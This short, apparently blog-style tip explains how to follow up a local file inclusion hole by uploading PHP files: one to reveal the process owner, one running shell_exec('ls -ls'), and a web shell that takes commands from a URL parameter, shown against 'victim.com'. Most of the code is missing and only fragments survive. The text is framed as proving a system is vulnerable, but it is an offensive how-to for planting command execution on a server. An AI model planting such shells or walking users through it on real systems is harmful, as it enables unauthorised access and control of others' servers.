If you have have local file inclusion and can upload your own files here a few files to help get further or more information.
Create the file on you attack machine and upload it.
The first one will show who the php process is running as if it has the privilege to execute.
// show the user that owns the running php/httpd process
The second will show listing of the directory the php file is located in.
$output = shell_exec(‘ls -ls’);
The third will allow commands to be passed in on the URL. Like “http://victim.com/about.php?cmd=ls -al”
There are a ton of these out there the ones I listed are the quick and dirty ones that just help you prove the system is vulnerable and get you a bit more information. 🙂